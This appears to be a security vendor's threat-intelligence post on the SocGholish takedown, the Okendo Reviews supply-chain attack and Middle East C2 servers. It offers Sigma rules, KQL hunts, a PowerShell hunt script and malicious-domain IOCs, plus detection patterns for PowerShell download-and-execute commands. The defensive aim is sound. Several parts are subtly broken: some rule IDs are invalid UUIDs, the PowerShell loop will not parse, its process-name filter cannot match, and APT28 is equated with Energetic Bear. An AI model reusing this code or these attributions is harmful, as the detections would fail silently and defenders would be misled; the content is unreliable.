Recent OTX pulses highlight a disturbing convergence of nation-state infrastructure build-up and "Initial Access as a Service" operations. While Operation Endgame has successfully disrupted the SocGholish (TA569) malware framework—taking down 106 servers and remediating 15,000 WordPress sites—threat actors are rapidly pivoting to supply chain compromises to maintain access.

Simultaneously, intelligence from the Middle East reveals a massive consolidation of Command-and-Control (C2) infrastructure, with 72.4% of 1,350+ identified C2 servers hosted on a single Saudi ISP (STC). This infrastructure supports diverse threats ranging from IoT botnets (Hajime, Mirai) to sophisticated APT toolkits (Sliver, Cobalt Strike) and wipers (DYNOWIPER).

Of particular concern is the Okendo Reviews supply chain attack by SmartApeSG. By injecting malicious JavaScript into a legitimate e-commerce widget used by 18,000+ brands, actors are delivering NetSupport RAT and Remcos directly to high-traffic retail sites. This mirrors the tactics of the disrupted SocGholish campaign (fake browser updates), indicating a resilience of the "ClickFix" social engineering vector despite law enforcement takedowns.

Threat Actor / Malware Profile

Key Actors & Malware

SmartApeSG: Observed leveraging a supply chain attack on the Okendo Reviews widget. They utilize malicious JavaScript injection to load a staged payload which ultimately delivers Remote Access Trojans (RATs) like NetSupport, Remcos, and StealC.
GOLD PRELUDE / TA569: The operators behind SocGholish. Despite Operation Endgame disruptions, their ecosystem (IcedID, Pikabot, QakBot) remains historically significant as a primary dropper for ransomware crews.
APT28 / Energetic Bear: Associated with the massive Middle Eastern C2 infrastructure spike, utilizing frameworks like Sliver and Cobalt Strike alongside wiper malware (DYNOWIPER, RondoDox) targeting Energy and Government sectors.

Tactics, Techniques, and Procedures (TTPs)

Distribution:
- Supply Chain: Malicious JS injection into third-party widgets (Okendo).
- SEO Poisoning / Compromised Sites: Fake browser update prompts (SocGholish style).
Payload Behavior: The injected JavaScript acts as a loader, utilizing obfuscation and localStorage to stage second-stage payloads. In the Middle East campaigns, actors are employing heavy obfuscation via frameworks like Tactical RMM and AsyncRAT.
Persistence: Use of Scheduled Tasks and Registry Run keys for NetSupport RAT and Remcos.
C2 Communication: Heavy reliance on HTTP/HTTPS for C2, utilizing SSL/TLS to blend in with legitimate web traffic.

IOC Analysis

The provided intelligence offers a mix of network indicators and software vulnerabilities:

Hostnames (C2 & Infrastructure): The SocGholish and Okendo pulses provide specific malicious hostnames (e.g., trademark.iglesiaelarca.com, api.wigetticks.com). These are critical for immediate DNS blocking and firewall deny-listing.
URLs: Specific malicious URLs for the compromised Okendo widget (http://cdn-static.okendo.io/...). SOCs should inspect proxy logs for GET requests to these specific paths.
CVE: CVE-2025-11953 is referenced in the Middle East report, likely linked to the initial access vector for the wiper deployment.

Operational Guidance: SOC teams should ingest these IOCs into SIEM correlation engines and EDR threat feeds. While the hostnames indicate active C2 or redirectors, the sheer volume (1,350+ C2s in the Middle East) suggests automated blocking of the ASNs associated with the identified bulletproof hosting providers is more effective than individual IP blocking.

Detection Engineering

The following detection logic targets the specific behaviors identified in these pulses: the malicious JavaScript delivery, the NetSupport RAT deployment common to multiple pulses, and the persistence mechanisms used.

YAML

title: Potential Malicious Okendo Widget or Supply Chain JS Injection
id: 8d1f4a2b-6c3e-4a5d-9b1a-2c3d4e5f6a7b
description: Detects potential connection to malicious domains associated with the Okendo supply chain attack or SocGholish fake updates.
status: experimental
date: 2026/06/21
author: Security Arsenal
references:
    - https://www.zscaler.com/blogs/security-research/smartapesg-launches-okendo-reviews-supply-chain-attack
    - https://www.infoblox.com/blog/threat-intelligence/hot-take-operation-endgame-vs-socgholish/
tags:
    - attack.initial_access
    - attack.t1190
logsource:
    category: proxy
detection:
    selection:
        c-hostname|contains:
            - 'wigetticks.com'
            - 'wizzleticks.com'
            - 'iglesiaelarca.com'
            - 'garretttrails.org'
            - 'roofnrack.us'
    condition: selection
falsepositives:
    - Unknown
level: critical
---
title: NetSupport RAT Execution Activity
id: 9e2g5b3c-7d4f-5b6e-0c2b-3d4e5f6a7b8c
description: Detects execution of NetSupport Manager client (client32.exe), frequently used in recent supply chain and fake update campaigns including Okendo and SocGholish.
status: experimental
date: 2026/06/21
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6674a1c2d9f8b
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
detection:
    selection:
        Image|endswith:
            - '\client32.exe'
            - '\client64.exe'
        OriginalFileName:
            - 'client32.exe'
    condition: selection
falsepositives:
    - Legitimate administrative use (should be filtered by target list)
level: high
---
title: Suspicious PowerShell Download via Fake Update Patterns
id: 0f1h2i3j-4k5l-6m7n-8o9p-0q1r2s3t4u5v
description: Detects PowerShell commands attempting to download content mimicking browser updates or utilizing obfuscation seen in SocGholish and SmartApeSG campaigns.
status: experimental
date: 2026/06/21
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6674a1c2d9f8b
tags:
    - attack.command_and_control
    - attack.t1105
logsource:
    category: process_creation
detection:
    selection:
        Image|endswith:
            - '\powershell.exe'
        CommandLine|contains:
            - 'downloadstring'
            - 'iex'
        CommandLine|contains:
            - 'update'
            - 'chrome'
            - 'browser'
    condition: selection
falsepositives:
    - System update scripts
level: medium

KQL (Microsoft Sentinel)

Hunt for network connections to the specific IOCs and process creation events related to the malware families.

KQL — Microsoft Sentinel / Defender

// Hunt for malicious C2 hostnames from Okendo and SocGholish pulses
DeviceNetworkEvents
| where RemoteUrl in~ (
    "trademark.iglesiaelarca.com", 
    "content.garretttrails.org", 
    "promo.summat10n.org", 
    "billing.roofnrack.us", 
    "api.wigetticks.com", 
    "api.wizzleticks.com"
)
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemoteIP
| extend Tactic = "C2 Communication"
;
// Hunt for NetSupport RAT and Remcos processes
DeviceProcessEvents 
| where FileName in~ ("client32.exe", "client64.exe", "Remcos.exe")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, InitiatingProcessFileName
| extend Tactic = "Execution"

PowerShell Hunt Script

Checks for active network connections to known malicious IOCs and common NetSupport RAT process artifacts.

PowerShell

# IOC Hunt for Okendo/SocGholish C2s and NetSupport RAT
$MaliciousHosts = @(
    "wigetticks.com",
    "wizzleticks.com",
    "iglesiaelarca.com",
    "roofnrack.us"
)

Write-Host "[+] Checking for active network connections to malicious IOCs..."
$Connections = Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue

foreach $Conn in $Connections {
    try {
        $RemoteAddress = [System.Net.Dns]::GetHostEntry($Conn.RemoteAddress)
        if ($MaliciousHosts -icontains $RemoteAddress.HostName) {
            Write-Host "[!] Suspicious connection found: $($RemoteAddress.HostName) on PID $($Conn.OwningProcess)" -ForegroundColor Red
            Get-Process -Id $Conn.OwningProcess | Select-Object ProcessName, Path
        }
    } catch {
        # Ignore DNS resolution failures for local IPs
    }
}

Write-Host "[+] Scanning for NetSupport RAT processes..."
$RATProcesses = Get-Process | Where-Object { $_.ProcessName -like "client32.exe" -or $_.ProcessName -like "client64.exe" }

if ($RATProcesses) {
    Write-Host "[!] NetSupport RAT process detected!" -ForegroundColor Red
    $RATProcesses | Format-List *
} else {
    Write-Host "[-] No NetSupport RAT processes found."
}


# Response Priorities

*   **Immediate**:
    *   Block all hostnames and domains listed in the IOC Analysis section at the perimeter firewall and proxy.
    *   Kill any processes matching `client32.exe`, `Remcos.exe`, or suspicious PowerShell download scripts.
    *   Isolate endpoints showing signs of connectivity to the Middle Eastern C2 infrastructure range if outside expected business geography.

*   **24h**:
    *   Perform credential resets for users who accessed the compromised Okendo widget domains or interacted with the SocGholish fake update prompts.
    *   Hunt for the persistence mechanisms (Scheduled Tasks/Registry keys) associated with NetSupport RAT and Remcos on endpoints identified as having suspicious process execution.

*   **1 Week**:
    *   Conduct a review of all third-party JavaScript widgets and supply chain dependencies. Enforce Subresource Integrity (SRI) where possible.
    *   Update EDR policies to specifically flag unsigned or loosely signed executables originating from browser child processes (typical ClickFix behavior).
    *   Review network segmentation for OT and Energy sectors to limit lateral movement from IoT botnets identified in the Middle East pulse.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

SocGholish Takedown, Okendo Supply Chain & Middle East C2 Expansion: OTX Pulse Analysis